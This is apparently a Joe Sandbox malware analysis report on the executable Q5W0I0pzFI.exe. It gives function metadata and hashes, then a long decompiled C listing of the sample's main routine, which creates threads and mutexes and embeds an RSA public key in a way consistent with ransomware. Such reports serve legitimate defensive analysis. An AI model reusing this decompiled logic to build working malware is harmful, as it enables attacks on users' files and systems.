Function 0225FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0225FBF1
__CxxThrowException@8.LIBCMT ref: 0225FC06

Strings

TeM, xrefs: 0225FBFB, 0225FBE7
TeM, xrefs: 0225FBFE

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: TeM$TeM
API String ID: 3728558374-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 3cd2aca9c7b4cbeb1c62a993a0f4e0202a46b02cec2f1cbb44b527e4dbbc041b
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 59D067B5C1030CBBCB04EFA5D459CDDBBB9AA04744B408466A91897245EA74E3998F94

Uniqueness

Uniqueness Score: -1.00%

Function 0221D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0223197D: __wfsopen.LIBCMT ref: 02231988

_fgetws.LIBCMT ref: 0221D15C

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 33f3d2ee45880dfa582efd98ba17f6baac15f36af19708685b89d6f83a805c70
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 1A91A1B1D2031AEBCB25DFE4CC44BAEB7F5BF14304F140529E815A7245E7B6AA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0221D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 0221D77E
_malloc.LIBCMT ref: 0221D7B2
_malloc.LIBCMT ref: 0221D7C1
_fprintf.LIBCMT ref: 0221D815

Memory Dump Source

Source File: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2210000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 724a4720dfe1e748edc227a24592de93b31c656b1134eac511799c75364f0604
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: F0A16FB1C10348EBEF11EFE4C849BEEBBB6AF14304F140128D40576295D7B65A98CFA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Q5W0I0pzFI.exePID: 1516, Parent PID: 2420COMMON

Executed Functions

Function 00419F90 Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
				intOrPtr _v0;
				int _v4;
				long _v8;
				WCHAR** _v12;
				char _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t573;
				int _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				char _t846;
				void* _t854;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t892;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				void** _t989;
				signed int _t990;
				signed int _t991;
				void** _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				int* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				int* _t1231;
				int _t1232;
				int _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				char _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x62dab0
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x2
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8)));
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									__eflags = E00412220() - 1;
								} else {
									_t892 = E00412220(); // executed
									__eflags = _t892 - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272.hwnd = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200); // executed
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200, 0);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20, 0);
											E0040D240( *(_t1230 + 0x8cc)); // executed
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v16);
												_t1268 = _t1268 + 4;
											}
											_t581 = _a8;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104.hwnd = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															E00413FF0(_t950, _t1140, _t861, 0);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258); // executed
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
															L00422587(_a80);
															_t1268 = _t1268 + 4;
														}
													}
												}
												E0040EF50(0x50fe90,  &_v16, __eflags, 0xa);
												_t1292 = _t1268 + 4;
												_t1244 = 0;
												__eflags = 0;
												do {
													_t846 = _v16;
													_a20 =  *(_t846 + _t1244 * 4);
													_t1215 = 2 + lstrlenA( *(_t846 + _t1244 * 4)) * 2;
													_t950 = E00420C62(_t950,  &_v16, _t1215, _t1215);
													E0042B420(_t950, 0, _t1215);
													_t1292 = _t1292 + 0x10;
													MultiByteToWideChar(0, 0, _a20, 0xffffffff, _t950, _t1215 >> 1);
													lstrcatW(0x513290, _t950);
													_t1244 = _t1244 + 1;
													__eflags = _t1244 - 0xa;
												} while (_t1244 < 0xa);
												__eflags = lstrlenW("-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ");
												if(__eflags <= 0) {
													E0040E760(0x513278, __eflags); // executed
													 *0x529225 = _a16;
													 *0x529226 = _a28; // executed
													_t856 = CreateThread(0, 0x61a8000, E0041E690, 0x513270, 0, 0x51325c); // executed
													 *0x513260 = _t856;
													WaitForSingleObject(_t856, 0xffffffff);
												}
												_t854 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}"); // executed
												 *0x513238 = _t854;
											}
											goto L82;
										} else {
											__eflags = _t950;
											if(_t950 != 0) {
												goto L62;
											} else {
												__eflags =  *0x513234 - _t950;
												if(__eflags != 0) {
													L81:
													 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
													L82:
													E0040EF50(0x50ff80,  &_v16, __eflags, 0xa);
													_t1231 = _v16;
													_t1269 = _t1268 + 4;
													_a340 = 0xf;
													_t1204 = 0;
													__eflags = 0;
													_a336 = 0;
													_a320 = 0;
													do {
														_t1167 =  *((intOrPtr*)(_t1231 + _t1204 * 4));
														__eflags =  *_t1167;
														if( *_t1167 != 0) {
															_t986 = _t1167;
															_t950 = _t986 + 1;
															do {
																_t585 =  *_t986;
																_t986 = _t986 + 1;
																__eflags = _t585;
															} while (_t585 != 0);
															_t987 = _t986 - _t950;
															__eflags = _t987;
														} else {
															_t987 = 0;
														}
														_push(_t987);
														E00413EA0(_t950,  &_a320, _t1204, _t1231, _t1167);
														_t1204 = _t1204 + 1;
														__eflags = _t1204 - 0xa;
													} while (_t1204 < 0xa);
													_t1270 = _t1269 - 0x18;
													_v20 = 0;
													_t1168 = _t1270;
													_t1205 =  &_v20;
													 *(_t1168 + 0x14) = 7;
													 *(_t1168 + 0x10) = 0;
													 *_t1168 = 0;
													__eflags =  *0x51a7c0; // 0x2d
													if(__eflags != 0) {
														_t989 = 0x51a7c0;
														_t1231 = 0x51a7c2;
														do {
															_t588 =  *_t989;
															_t989 =  &(_t989[0]);
															__eflags = _t588;
														} while (_t588 != 0);
														_t990 = _t989 - 0x51a7c2;
														__eflags = _t990;
														_t991 = _t990 >> 1;
													} else {
														_t991 = 0;
													}
													_push(_t991);
													E00415C10(0, _t1168, _t1205, _t1231, "-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ");
													_t590 = E00412840( &_v20, 0);
													_t1271 = _t1270 + 0x18;
													__eflags =  *((intOrPtr*)(_t590 + 0x14)) - 0x10;
													if( *((intOrPtr*)(_t590 + 0x14)) >= 0x10) {
														_t590 =  *_t590;
													}
													E00410FC0(_t590, _t1205); // executed
													__eflags = _a4 - 0x10;
													_t1232 = _v28;
													if(_a4 >= 0x10) {
														L00422587(_v16);
														_t1271 = _t1271 + 4;
													}
													_t592 = lstrlenA(_v24);
													__eflags = _t592 - 0x20;
													if(_t592 == 0x20) {
														_t1272 = _t1271 - 0x18;
														_t1171 = _t1272;
														_t952 = 0;
														 *(_t1171 + 0x14) = 7;
														 *(_t1171 + 0x10) = 0;
														 *_t1171 = 0;
														__eflags =  *0x51a7c0; // 0x2d
														if(__eflags != 0) {
															_t995 = 0x51a7c0;
															_t1205 = 0x51a7c2;
															do {
																_t594 =  *_t995;
																_t995 =  &(_t995[0]);
																__eflags = _t594;
															} while (_t594 != 0);
															_t996 = _t995 - 0x51a7c2;
															__eflags = _t996;
															_t997 = _t996 >> 1;
														} else {
															_t997 = 0;
														}
														_push(_t997);
														E00415C10(_t952, _t1171, _t1205, _t1232, "-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZ");
														_t596 = E00412840( &_v24, _t952);
														_t1273 = _t1272 + 0x18;
														__eflags = _t596[0x14] - 0x10;
														if(_t596[0x14] >= 0x10) {
															_t596 =  *_t596;
														}
														lstrcpyA(_t1232 + 0x28, _t596);
														__eflags = _v0 - 0x10;
														if(_v0 >= 0x10) {
															L00422587(_v20);
															_t1273 = _t1273 + 4;
														}
														__eflags =  *0x521cf0;
														if( *0x521cf0 != 0) {
															_t1000 = 0x521cf0;
															_t216 =  &(_t1000[1]); // 0x521cf2
															_t1173 = _t216;
															do {
																_t599 =  *_t1000;
																_t1000 =  &(_t1000[1]);
																__eflags = _t599;
															} while (_t599 != 0);
															_t1001 = _t1000 - _t1173;
															__eflags = _t1001;
															_t1002 = _t1001 >> 1;
														} else {
															_t1002 = 0;
														}
														_push(_t1002);
														E00415C10(_t952, _t1232 + 0x858, _t1205, _t1232, 0x521cf0);
														E0040EF50(0x50ffb0,  &_v36, __eflags, 0xa);
														_t1233 = _v36;
														_t1274 = _t1273 + 4;
														_a248 = 0xf;
														_t1206 = 0;
														__eflags = 0;
														_a244 = 0;
														_a228 = 0;
														do {
															_t1175 =  *((intOrPtr*)(_t1233 + _t1206 * 4));
															__eflags =  *_t1175;
															if( *_t1175 != 0) {
																_t1005 = _t1175;
																_t952 = _t1005 + 1;
																do {
																	_t602 =  *_t1005;
																	_t1005 = _t1005 + 1;
																	__eflags = _t602;
																} while (_t602 != 0);
																_t1006 = _t1005 - _t952;
																__eflags = _t1006;
															} else {
																_t1006 = 0;
															}
															_push(_t1006);
															E00413EA0(_t952,  &_a232, _t1206, _t1233, _t1175);
															_t1206 = _t1206 + 1;
															__eflags = _t1206 - 0xa;
														} while (_t1206 < 0xa);
														_t1275 = _t1274 - 0x18;
														_t1008 = _t1275;
														_push(0xffffffff);
														 *(_t1008 + 0x14) = 0xf;
														 *(_t1008 + 0x10) = 0;
														 *_t1008 = 0;
														E00413FF0(0, _t1008,  &_a228, 0);
														_t1207 = E00412900( &_v40, 0);
														_t955 = _v52 + 0x828;
														_t1276 = _t1275 + 0x18;
														__eflags = _t955 - _t1207;
														if(_t955 != _t1207) {
															__eflags = _t955[5] - 8;
															if(_t955[5] >= 8) {
																L00422587( *_t955);
																_t1276 = _t1276 + 4;
															}
															_t955[5] = 7;
															_t955[4] = 0;
															 *_t955 = 0;
															__eflags = _t1207[5] - 8;
															if(_t1207[5] >= 8) {
																 *_t955 =  *_t1207;
																 *_t1207 = 0;
															} else {
																_t839 = _t1207[4] + 1;
																__eflags = _t839;
																if(_t839 != 0) {
																	E004205A0(_t955, _t1207, _t839 + _t839);
																	_t1276 = _t1276 + 0xc;
																}
															}
															_t955[4] = _t1207[4];
															_t955[5] = _t1207[5];
															__eflags = 0;
															_t1207[5] = 7;
															_t1207[4] = 0;
															 *_t1207 = 0;
														}
														__eflags = _v12 - 8;
														if(__eflags >= 0) {
															L00422587(_v32);
															_t1276 = _t1276 + 4;
														}
														E0040EF50(0x50fef0,  &_v40, __eflags, 0xa);
														_t1234 = _v40;
														_t1277 = _t1276 + 4;
														_a220 = 0xf;
														_t1208 = 0;
														__eflags = 0;
														_a216 = 0;
														_a200 = 0;
														do {
															_t1178 =  *((intOrPtr*)(_t1234 + _t1208 * 4));
															__eflags =  *_t1178;
															if( *_t1178 != 0) {
																_t1011 = _t1178;
																_t955 = _t1011 + 1;
																do {
																	_t608 =  *_t1011;
																	_t1011 = _t1011 + 1;
																	__eflags = _t608;
																} while (_t608 != 0);
																_t1012 = _t1011 - _t955;
																__eflags = _t1012;
															} else {
																_t1012 = 0;
															}
															_push(_t1012);
															E00413EA0(_t955,  &_a200, _t1208, _t1234, _t1178);
															_t1208 = _t1208 + 1;
															__eflags = _t1208 - 0xa;
														} while (_t1208 < 0xa);
														_t1278 = _t1277 - 0x18;
														_t1014 = _t1278;
														_push(0xffffffff);
														 *(_t1014 + 0x14) = 0xf;
														 *(_t1014 + 0x10) = 0;
														 *_t1014 = 0;
														E00413FF0(0, _t1014,  &_a196, 0);
														_t1209 = E00412900( &_v48, 0);
														_t958 = _v60 + 0x840;
														_t1279 = _t1278 + 0x18;
														__eflags = _t958 - _t1209;
														if(_t958 != _t1209) {
															__eflags = _t958[5] - 8;
															if(_t958[5] >= 8) {
																L00422587( *_t958);
																_t1279 = _t1279 + 4;
															}
															_t958[5] = 7;
															_t958[4] = 0;
															 *_t958 = 0;
															__eflags = _t1209[5] - 8;
															if(_t1209[5] >= 8) {
																 *_t958 =  *_t1209;
																 *_t1209 = 0;
															} else {
																_t828 = _t1209[4] + 1;
																__eflags = _t828;
																if(_t828 != 0) {
																	E004205A0(_t958, _t1209, _t828 + _t828);
																	_t1279 = _t1279 + 0xc;
																}
															}
															_t958[4] = _t1209[4];
															_t958[5] = _t1209[5];
															__eflags = 0;
															_t1209[5] = 7;
															_t1209[4] = 0;
															 *_t1209 = 0;
														}
														__eflags = _v20 - 8;
														if(__eflags >= 0) {
															L00422587(_v40);
															_t1279 = _t1279 + 4;
														}
														E0040EF50(0x50ff20,  &_v48, __eflags, 0xa);
														_t1235 = _v48;
														_t1280 = _t1279 + 4;
														_a284 = 0xf;
														_t1210 = 0;
														__eflags = 0;
														_a280 = 0;
														_a264 = 0;
														do {
															_t1181 =  *((intOrPtr*)(_t1235 + _t1210 * 4));
															__eflags =  *_t1181;
															if( *_t1181 != 0) {
																_t1017 = _t1181;
																_t958 = _t1017 + 1;
																do {
																	_t614 =  *_t1017;
																	_t1017 = _t1017 + 1;
																	__eflags = _t614;
																} while (_t614 != 0);
																_t1018 = _t1017 - _t958;
																__eflags = _t1018;
															} else {
																_t1018 = 0;
															}
															_push(_t1018);
															E00413EA0(_t958,  &_a264, _t1210, _t1235, _t1181);
															_t1210 = _t1210 + 1;
															__eflags = _t1210 - 0xa;
														} while (_t1210 < 0xa);
														_t1281 = _t1280 - 0x18;
														_t1020 = _t1281;
														_push(0xffffffff);
														 *(_t1020 + 0x14) = 0xf;
														 *(_t1020 + 0x10) = 0;
														 *_t1020 = 0;
														E00413FF0(0, _t1020,  &_a260, 0);
														_t618 = E00412900( &_v56, 0);
														_t1236 = _v68;
														_t1211 = _t618;
														_t1282 = _t1281 + 0x18;
														_t960 = _t1236 + 0x870;
														__eflags = _t960 - _t1211;
														if(_t960 != _t1211) {
															__eflags = _t960[5] - 8;
															if(_t960[5] >= 8) {
																L00422587( *_t960);
																_t1282 = _t1282 + 4;
															}
															_t960[5] = 7;
															_t960[4] = 0;
															 *_t960 = 0;
															__eflags = _t1211[5] - 8;
															if(_t1211[5] >= 8) {
																 *_t960 =  *_t1211;
																 *_t1211 = 0;
															} else {
																_t817 = _t1211[4] + 1;
																__eflags = _t817;
																if(_t817 != 0) {
